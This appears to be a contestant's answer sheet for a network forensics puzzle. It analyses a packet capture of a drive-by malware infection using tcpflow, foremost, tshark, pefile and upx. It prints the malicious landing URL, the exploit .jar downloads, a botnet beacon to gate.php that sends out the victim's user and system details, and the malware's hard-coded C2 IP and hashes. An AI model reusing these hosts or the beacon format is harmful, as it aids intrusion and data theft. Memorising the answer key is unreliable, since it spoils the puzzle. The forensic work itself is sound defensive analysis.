Name: Iñaki Rodríguez
Email: irodriguez@virtualminds.es
Answer 1a: sdfg.jar
Answer 1b: q.jar
Answer 2: ADMINISTRATOR
Answer 3: http://nrtjo.eu/true.php
Answer 4: 5942BA36CF732097479C51986EEE91ED
Answer 5: UPX
Answer 6: 0f37839f48f7fc77e6d50e14657fb96e
Answer 7: 213.155.29.144
Description:
------------------------------------------------------------------------------------------
Q1. As part of the infection process, Ms. Moneymany’s browser downloaded two Java applets. What were the names of the two .jar files that implemented these applet
A1. Firstly, we extract all streams from pcap file with tcpflow:
pentest@morgul:~/forensic/streams$ tcpflow -r ../infected.pcap
pentest@morgul:~/forensic/streams$ ls
059.053.091.102.00080-192.168.023.129.01061 192.168.023.129.01063-059.053.091.102.00080
059.053.091.102.00080-192.168.023.129.01063 192.168.023.129.01064-059.053.091.102.00080
059.053.091.102.00080-192.168.023.129.01064 192.168.023.129.01065-059.053.091.102.00080
059.053.091.102.00080-192.168.023.129.01065 192.168.023.129.01066-059.053.091.102.00080
059.053.091.102.00080-192.168.023.129.01066 192.168.023.129.01067-059.053.091.102.00080
059.053.091.102.00080-192.168.023.129.01067 192.168.023.129.01068-213.155.029.144.00444
065.055.195.250.00443-192.168.023.129.01062 192.168.023.129.01069-212.252.032.020.00080
192.168.023.129.01061-059.053.091.102.00080 212.252.032.020.00080-192.168.023.129.01069
192.168.023.129.01062-065.055.195.250.00443
Using a file carving tool like foremost, we search for jar files:
pentest@morgul:~/forensic/streams$ ls -d output*
output_Sat_Apr_17_02_00_44_2010
pentest@morgul:~/forensic/streams$ cd output_Sat_Apr_17_02_00_44_2010/
pentest@morgul:~/forensic/streams/output_Sat_Apr_17_02_00_44_2010$ ls
audit.txt exe htm jar
We show a jar directory so we only have to go to that directory to see those two jar files:
pentest@morgul:~/forensic/streams/output_Sat_Apr_17_02_00_44_2010$ cd jar/
pentest@morgul:~/forensic/streams/output_Sat_Apr_17_02_00_44_2010/jar$ ls
00000000_1.jar 00000000.jar
Also we extract the content (jar file is a zip file) to ensure that foremost obtained files correctly:
pentest@morgul:~/forensic/streams/output_Sat_Apr_17_02_00_44_2010/jar$ unzip 00000000_1.jar
Archive: 00000000_1.jar
inflating: AppletPanel.class
inflating: Main.class
pentest@morgul:~/forensic/streams/output_Sat_Apr_17_02_00_44_2010/jar$ unzip 00000000.jar
Archive: 00000000.jar
creating: META-INF/
extracting: META-INF/MANIFEST.MF
creating: myf/
creating: myf/y/
inflating: myf/y/AppletX.class
inflating: myf/y/LoaderX.class
inflating: myf/y/PX.class
To complete the answer, we look for the url of jar files:
pentest@morgul:~/forensic/streams$ grep -n5 jar * | grep -E "jar|Host"
192.168.023.129.01064-059.053.091.102.00080:1:GET /sdfg.jar HTTP/1.1
192.168.023.129.01064-059.053.091.102.00080-5-Host: nrtjo.eu
192.168.023.129.01065-059.053.091.102.00080:1:GET /q.jar HTTP/1.1
192.168.023.129.01065-059.053.091.102.00080-5-Host: nrtjo.eu
After that we have the answer:
1. sdfg.jar (http://nrtjo.eu/sdfg.jar)
2. q.jar (http://nrtjo.eu/q.jar)
Alternative:
pentest@morgul:~/forensic$ tshark -T fields -e ip.dst -e http.host -e http.request.method -e http.request.uri -r infected.pcap -R http.request
59.53.91.102 nrtjo.eu GET /true.php
59.53.91.102 nrtjo.eu GET /xxx.xxx
59.53.91.102 nrtjo.eu GET /favicon.ico
59.53.91.102 nrtjo.eu GET /q.jar
59.53.91.102 nrtjo.eu GET /sdfg.jar
59.53.91.102 nrtjo.eu GET //loading.php?spl=javadnw&J050006010
59.53.91.102 nrtjo.eu GET //loading.php?spl=javad0
212.252.32.20 freeways.in GET /11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed
------------------------------------------------------------------------------------------
Q2. What was Ms. Moneymany’s username on the infected Windows system?
A2. Using tshark and wireshark we take a prelimary look to the content of pcap file:
........
293 50.609172 192.168.23.129 -> 212.252.32.20 HTTP GET /11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed HTTP/1.1
........
This packet seems to be any kind of attempt to connect to a C&C server to pass information about the infected machine. We show a reference to "ADMINISTRATOR" user. Also the machine name, internet explorer version (8.0.6001) and the md5 hash of malware file. So we deduce the answer is ADMINISTRATOR.
------------------------------------------------------------------------------------------
Q3. What was the starting URL of this incident? In other words, on which URL did Ms. Moneymany probably click?
A3.
With tshark we list all http requests:
irodriguez@morgul:~/forensic$ tshark -T fields -e ip.src -e tcp.srcport -e ip.dst -e http.host -e http.request.method -e http.request.uri -r infected.pcap -R http.request
192.168.23.129 1061 59.53.91.102 nrtjo.eu GET /true.php
192.168.23.129 1061 59.53.91.102 nrtjo.eu GET /xxx.xxx
192.168.23.129 1063 59.53.91.102 nrtjo.eu GET /favicon.ico
192.168.23.129 1065 59.53.91.102 nrtjo.eu GET /q.jar
192.168.23.129 1064 59.53.91.102 nrtjo.eu GET /sdfg.jar
192.168.23.129 1066 59.53.91.102 nrtjo.eu GET //loading.php?spl=javadnw&J050006010
192.168.23.129 1067 59.53.91.102 nrtjo.eu GET //loading.php?spl=javad0
192.168.23.129 1069 212.252.32.20 freeways.in GET /11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed
We see the first request url was http://nrtjo.eu/true.php. So we must ensure it was the starting URL. We search in our dumped version (tcpflow) the file name 059.053.091.102.00080-192.168.023.129.01061 ( srcip:srcport - dstip:dstport ). When we open the file with cat, it seems to be encoded:
irodriguez@morgul:~/forensic$ cat 059.053.091.102.00080-192.168.023.129.01061
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 17 Mar 2010 00:55:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 2000 00:00:00 GMT
Last-Modified: Thu, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Encoding: gzip
489
���X[o�6�~�� �0�#�-����<�s�>����m���D�N|Q%ڎ��G��+*�|IR����G$��;�����O'��`��{g�A,�$�����:b>���7�钪Q`%q����Ǻ��^��Ʒb�35�$��sv��|I�
q�m��猃�Ud���8q�H�cjNJ����G�Q:q+ϒ���6M�P�TN�)Q���ť�xy��-����`!��jH`�R�$nj���H~�+KG���u�g�4�iRq���~�f{5�`,���m��z��
����'� _���>H��0�~No/�q��wG��WE�%�Y���|)l��V8����W��kbm֩�Cl�X�L���7 �^w?�y���V�R?
.......
Next, using foremost, we try to extract that content. But foremost could not extract it, so I decided to teach foremost how extract it. We open /etc/foremost.conf file and we add this:
gz y 150000 \x1f\x8b \x00\x00\x0d\x0a
After this, we can extract gziped content:
irodriguez@morgul:~/forensic$ foremost 059.053.091.102.00080-192.168.023.129.01061
Processing: 059.053.091.102.00080-192.168.023.129.01061
|*|
irodriguez@morgul:~/forensic$ cd output/
irodriguez@morgul:~/forensic/output$ ls
audit.txt gz
irodriguez@morgul:~/forensic/output$ cd gz/
irodriguez@morgul:~/forensic/output/gz$ ls
00000000.gz
irodriguez@morgul:~/forensic/output/gz$ gunzip 00000000.gz
gzip: 00000000.gz: decompression OK, trailing garbage ignored
irodriguez@morgul:~/forensic/output/gz$ cat 00000000
Here we have the content extracted. We see an obfuscated html file with javascript and two applets (remember the first question). And It seems it's our answer (http://nrtjo.eu/true.php)
------------------------------------------------------------------------------------------
Q4. As part of the infection, a malicious Windows executable file was downloaded onto Ms. Moneymany’s system. What was the file’s MD5 hash? (Hint: It ends on “91ed”.)
A4. This time, foremost didn't help us. I tried tcpxtract also, without luck. Finally, I used Network Miner to extract file.exe with MD5 5942BA36CF732097479C51986EEE91ED.
------------------------------------------------------------------------------------------
Q5. What is the name of the packer used to protect the malicious Windows executable? Hint: This is one of the most popular freely-available packers seen in “mainstream” malware.
A5.
Using pefile from Ero Carrera, we can identify the packer. Pefile can use PeID signature database. Debian python-pefile package has an example script we can use to identify the packer:
morgul:/usr/share/doc/python-pefile/examples# wget http://www.peid.info/BobSoft/Downloads/UserDB.zip
--2010-05-09 00:15:48-- http://www.peid.info/BobSoft/Downloads/UserDB.zip
Resolviendo www.peid.info... 217.157.129.212
Connecting to www.peid.info|217.157.129.212|:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 93822 (92K) [application/zip]
Saving to: `UserDB.zip'
100%[===================================================================================>] 93.822 18,2K/s in 5,0s
2010-05-09 00:15:53 (18,2 KB/s) - `UserDB.zip' saved [93822/93822]
morgul:/usr/share/doc/python-pefile/examples# unzip UserDB.zip
Archive: UserDB.zip
inflating: UserDB.TXT
morgul:/usr/share/doc/python-pefile/examples# python pefile-match UserDB.TXT /home/irodriguez/forensic/file.exe
/home/irodriguez/forensic/file.exe.octet-stream: [['UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser'], ['Crypto-Lock v2.02 (Eng) -> Ryan Thian']]
morgul:/usr/share/doc/python-pefile/examples#
We see it's packed with UPX, also it detects another packer (usually in modern malwares to bypass signature based detectors). I used another packer detector (RDG Packer Detector) and it detects too UPX packer.
------------------------------------------------------------------------------------------
Q6. What is the MD5 hash of the unpacked version of the malicious Windows executable file?
A6. We could dump the process from memory or we can use upx to unpack it. Sometimes, malware writers modify the packers, but this time I could use upx command to unpack it:
irodriguez@morgul:~/forensic$ upx -d file.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2009
UPX 3.04 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 27th 2009
File size Ratio Format Name
-------------------- ------ ----------- -----------
82432 <- 68096 82.61% win32/pe file.exe
Unpacked 1 file.
irodriguez@morgul:~/forensic$ md5sum file.exe
0f37839f48f7fc77e6d50e14657fb96e file.exe
After unpack it, we have the MD5: 0f37839f48f7fc77e6d50e14657fb96e.
Also we open file.exe with Immunity Debugger and Ida pro to ensure that we unpack it well. And both could open it without problems.
------------------------------------------------------------------------------------------
Q7. The malicious executable attempts to connect to an Internet host using an IP address which is hard-coded into it (there was no DNS lookup). What is the IP address of that Internet host?
A7. This malware is very obfuscated. If you open with a debugger, you will not found any network function imported. But if you trace it or if you open it with IDA, you will see that it creates another IAT using LdrLoaddll in which it stores reference to other libraries (including wininet.dll). But I used another method based on discard ips resolved in infected.pcap file:
1. We get unique ips:
irodriguez@morgul:~/forensic$ tshark -r infected.pcap -Tfields -e ip.src | sort | uniq
192.168.23.129
192.168.23.2
212.252.32.20
213.155.29.144
59.53.91.102
65.55.195.250
2. We get dns responses:
irodriguez@morgul:~/forensic$ tshark -r infected.pcap -R dns | grep "response A" | cut -d'-' -f 2 | cut -d' ' -f 8 | sort | uniq
212.252.32.20
59.53.91.102
3. We discard internal and resolved ips so the list reduces to:
213.155.29.144
65.55.195.250
We have now only 2 ips unresolved from those 6. And we have to discover which is our answer. We start with 65.55.195.250. First, lets see what kind of traffic generated:
irodriguez@morgul:~/forensic$ tshark -r infected.pcap -R 'ip.src==65.55.195.250 || ip.dst==65.55.195.250'
17 6.632424 192.168.23.129 -> 65.55.195.250 TCP veracity > https [SYN] Seq=0 Win=64240 Len=0 MSS=1460
18 6.714673 65.55.195.250 -> 192.168.23.129 TCP https > veracity [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460
19 6.720153 192.168.23.129 -> 65.55.195.250 TCP veracity > https [ACK] Seq=1 Ack=1 Win=64240 Len=0
20 6.720171 192.168.23.129 -> 65.55.195.250 SSL Client Hello
21 6.720195 65.55.195.250 -> 192.168.23.129 TCP https > veracity [ACK] Seq=1 Ack=103 Win=64240 Len=0
22 6.956602 65.55.195.250 -> 192.168.23.129 TCP [TCP segment of a reassembled PDU]
23 6.956628 65.55.195.250 -> 192.168.23.129 TCP [TCP segment of a reassembled PDU]
24 6.956636 65.55.195.250 -> 192.168.23.129 TCP [TCP segment of a reassembled PDU]
25 6.956642 65.55.195.250 -> 192.168.23.129 TLSv1 Server Hello, Certificate, Server Hello Done
26 6.957309 192.168.23.129 -> 65.55.195.250 TCP veracity > https [ACK] Seq=103 Ack=4510 Win=64240 Len=0
27 6.964091 192.168.23.129 -> 65.55.195.250 TLSv1 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message
28 6.964112 65.55.195.250 -> 192.168.23.129 TCP https > veracity [ACK] Seq=4510 Ack=285 Win=64240 Len=0
29 7.053873 65.55.195.250 -> 192.168.23.129 TLSv1 Change Cipher Spec, Encrypted Handshake Message
30 7.063385 192.168.23.129 -> 65.55.195.250 TLSv1 Application Data
31 7.063678 65.55.195.250 -> 192.168.23.129 TCP https > veracity [ACK] Seq=4553 Ack=1319 Win=64240 Len=0
33 7.224818 65.55.195.250 -> 192.168.23.129 TLSv1 Application Data
34 7.225234 192.168.23.129 -> 65.55.195.250 TCP veracity > https [ACK] Seq=1319 Ack=5389 Win=63362 Len=0
35 7.225891 192.168.23.129 -> 65.55.195.250 TCP veracity > https [FIN, ACK] Seq=1319 Ack=5389 Win=63362 Len=0
36 7.225902 65.55.195.250 -> 192.168.23.129 TCP https > veracity [ACK] Seq=5389 Ack=1320 Win=64239 Len=0
Seems to be a TLS session. Now we could obtain whois information and the X.509 certificate from 65.55.195.250:
irodriguez@morgul:~/forensic$ openssl s_client -host 65.55.195.250 -port 443CONNECTED(00000003)
depth=2 /CN=Microsoft Internet Authority
verify error:num=20:unable to get local issuer certificate
verify return:0
---
Certificate chain
0 s:/C=US/ST=Washington/L=Redmond/O=Microsoft Corporation/OU=Windows Live Operations/CN=urs.microsoft.com
i:/DC=com/DC=microsoft/DC=corp/DC=redmond/CN=Microsoft Secure Server Authority
1 s:/DC=com/DC=microsoft/DC=corp/DC=redmond/CN=Microsoft Secure Server Authority
i:/CN=Microsoft Internet Authority
2 s:/CN=Microsoft Internet Authority
i:/C=US/O=GTE Corporation/OU=GTE CyberTrust Solutions, Inc./CN=GTE CyberTrust Global Root
.....
It seems a legal connection against Microsoft Server. Lets see whois information:
irodriguez@morgul:~/forensic$ whois 65.55.195.250
OrgName: Microsoft Corp
OrgID: MSFT
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US
NetRange: 65.52.0.0 - 65.55.255.255
CIDR: 65.52.0.0/14
NetName: MICROSOFT-1BLK
NetHandle: NET-65-52-0-0-1
Parent: NET-65-0-0-0-0
NetType: Direct Assignment
NameServer: NS1.MSFT.NET
NameServer: NS5.MSFT.NET
NameServer: NS2.MSFT.NET
NameServer: NS3.MSFT.NET
NameServer: NS4.MSFT.NET
Comment:
RegDate: 2001-02-14
Updated: 2004-12-09
..........
And again Microsoft. Finally we search AS info using http://www.serversniff.net/as-info.php:
IP-Adress: 65.55.195.250
AS-Number: 8075
Description: MICROSOFT-CORP---MSN-AS-BLOCK - Microsoft Corp
AS-Peers: AS701 AS1299 AS2516 AS2914 AS3320 AS3356 AS4565 AS4657 AS6453 AS19401
AS Range (cidr): 65.55.192.0/18
AS Range (ip): 65.55.192.0-65.55.255.255
AS Country: US
AS RIR: arin
AS Allocation Date: 1997-03-31
So we are sure that this ip comes from Microsoft. Now time to investigate 213.155.29.144:
irodriguez@morgul:~/forensic$ tshark -r infected.pcap -R 'ip.src==213.155.29.144 || ip.dst==213.155.29.144'
275 46.938655 192.168.23.129 -> 213.155.29.144 TCP instl_bootc > snpp [SYN] Seq=0 Win=64240 Len=0 MSS=1460
276 47.151484 213.155.29.144 -> 192.168.23.129 TCP snpp > instl_bootc [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460
277 47.151501 192.168.23.129 -> 213.155.29.144 TCP instl_bootc > snpp [ACK] Seq=1 Ack=1 Win=64240 Len=0
278 47.153472 192.168.23.129 -> 213.155.29.144 TCP instl_bootc > snpp [PSH, ACK] Seq=1 Ack=1 Win=64240 Len=263
279 47.153487 192.168.23.129 -> 213.155.29.144 TCP instl_bootc > snpp [FIN, ACK] Seq=264 Ack=1 Win=64240 Len=0
280 47.153492 213.155.29.144 -> 192.168.23.129 TCP snpp > instl_bootc [ACK] Seq=1 Ack=264 Win=64240 Len=0
281 47.153495 213.155.29.144 -> 192.168.23.129 TCP snpp > instl_bootc [ACK] Seq=1 Ack=265 Win=64239 Len=0
282 47.456882 213.155.29.144 -> 192.168.23.129 TCP snpp > instl_bootc [FIN, PSH, ACK] Seq=1 Ack=265 Win=64239 Len=0
283 47.458486 192.168.23.129 -> 213.155.29.144 TCP instl_bootc > snpp [ACK] Seq=265 Ack=2 Win=64240 Len=0
SNPP protocol is a text based protocol used by pagers (http://en.wikipedia.org/wiki/Simple_Network_Paging_Protocol) but as I tshark shows, the payload is not human readeable:
irodriguez@morgul:~/forensic$ tshark -r infected.pcap -R 'ip.dst==213.155.29.144' -x
275 46.938655 192.168.23.129 -> 213.155.29.144 TCP instl_bootc > snpp [SYN] Seq=0 Win=64240 Len=0 MSS=1460
0000 00 50 56 f5 48 d4 00 0c 29 ca 2a f2 08 00 45 00 .PV.H...).*...E.
0010 00 30 01 96 40 00 80 06 2d dd c0 a8 17 81 d5 9b .0..@...-.......
0020 1d 90 04 2c 01 bc 8c ec 94 86 00 00 00 00 70 02 ...,..........p.
0030 fa f0 95 7e 00 00 02 04 05 b4 01 01 04 02 ...~..........
irodriguez@morgul:~/forensic$ tshark -r infected.pcap -R 'ip.src==213.155.29.144' -x
276 47.151484 213.155.29.144 -> 192.168.23.129 TCP snpp > instl_bootc [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460
0000 00 0c 29 ca 2a f2 00 50 56 f5 48 d4 08 00 45 00 ..).*..PV.H...E.
0010 00 2c 00 d5 00 00 80 06 6e a2 d5 9b 1d 90 c0 a8 .,......n.......
0020 17 81 01 bc 04 2c 3b 65 59 30 8c ec 94 87 60 12 .....,;eY0....`.
0030 fa f0 15 df 00 00 02 04 05 b4 00 00 ............
We follow asking whois information:
irodriguez@morgul:~/forensic$ whois 213.155.29.144
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '213.155.29.144 - 213.155.29.151'
inetnum: 213.155.29.144 - 213.155.29.151
netname: alexjohnes
descr: alexjohnes - Taras Zadorojniy
country: NA
admin-c: TMUA171-RIPE
tech-c: TMUA171-RIPE
status: ASSIGNED PA
mnt-by: MNT-HOSTINGUA
source: RIPE # Filtered
person: Taras Zadorojniy
address: UA,74800, Kahovka ,Voroshilova str. 1, apt. 20
phone: +38 048 7281518
nic-hdl: TMUA171-RIPE
abuse-mailbox: abuse@hosting.ua
source: RIPE # Filtered
% Information related to '213.155.0.0/19AS41665'
route: 213.155.0.0/19
descr: Datacenter Hosting.UA
origin: AS41665
mnt-by: MNT-HOSTINGUA
source: RIPE # Filtered
Well, from Ukrania. Nothing against that country. We also search 213.155.29.144 using google and it links us to http://www.threatexpert.com/report.aspx?md5=5942ba36cf732097479c51986eee91ed in which we can read the analisys:
............
* The following Host Name was requested from a host database:
o 213.155.29.144
* There was registered attempt to establish connection with the remote host. The connection details are:
Remote Host Port Number
213.155.29.144 444
............
So the last answer is 213.155.29.144